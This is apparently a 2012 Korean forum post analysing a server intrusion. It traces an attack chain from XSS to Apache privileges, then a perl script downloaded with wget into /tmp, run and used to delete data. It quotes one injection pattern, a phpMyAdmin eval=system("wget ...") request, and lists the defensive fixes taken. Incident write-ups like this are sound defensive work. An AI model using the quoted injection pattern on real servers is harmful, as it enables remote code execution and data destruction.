이야기


게시글 '서버 침투 예상 경로'에 대한 정보
서버 침투 예상 경로
등록일 2012-02-10 조회 2,908
서버 예상 경로 Xss 취약점 > Apache 권한 > curl, wget 이용 perl 다운로드 > /tmp/ 에서 perl script 실행 > data,member,inc,notice 하위폴더 데이터 삭제


특이사항
perl cpu점유율 과다
/tmp/ perl 소스 생성
/var/tmp/nc.jpg(내용은 perl)
Apache error_log에 wget를 이용한 perl 다운로드 흔적 netstat 중국 ip연결시도 확인

추가
혹시나 역시 XSS(Cross-site scripting)으로 wget으로 /tmp 디렉토리에 외부사이트에서 perl을 내려 받은 후 mv를 이용해 p1.txt, p2.txt, p3.txt 으로 바꾼 후 perl p1.txt 로 실행 후 rm -rf *.txt 로 삭제했다.

/myadmin/config/config.inc.php?eval=system("wget ...")식으로 공격 지점을 포착했다.

조치
아직 완전하게 분석된 결과치가 아니라 wget,curl 권한 700 및 /usr/bin/perl 또한 700으로 변경 되었다.
/var/secure 및 lastlog, last 및 ftp 접속 흔적과 더불어 data 업로드 부분에서 확인된 흔적은 없었다.
wget 및 curl은 관리 입장에서는 편하지만 악 이용되는 경우인거 같다. 또한 myadmin의 경우에도 mysql을 관리하기 위해서는 편하지만 이러한 공격범위를 주게된다.
때문에 myadmin 접속을 인증을 거치게 하거나 관리 ip 외에는 차단 하는 방법이 좋겠다.